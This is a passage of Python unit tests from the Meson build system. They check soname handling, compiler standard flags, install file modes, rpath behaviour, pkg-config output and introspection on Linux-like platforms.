@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
            # c++03 and gnu++03 are not understood by ICC; don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
            # ICC won't fail in the above because additional flags are needed to
            # make it treat unknown -std=... options as errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
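        # Each target should get exactly one private directory containing its unified source.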
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
            # The chown would have failed non-fatally if we were not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
            # The chown would have failed non-fatally if we were not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
            # The chown would have failed non-fatally if we were not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
        install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
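        # The docbook target check below needs a recent enough glib, otherwise skip the rest.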
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
        self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
continue
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
        '''
        Test that an app can be built against libraries installed to a custom
        prefix by consuming their generated pkg-config files.
        '''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
            # On these platforms libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
        self.assertLess(deps.index(b'-lsomething'), deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.src_root, 'test cases', 'native', '201 override with exe')
self.init(testdir)
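        # The generated sources should carry an order-only dependency on the overriding executable.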
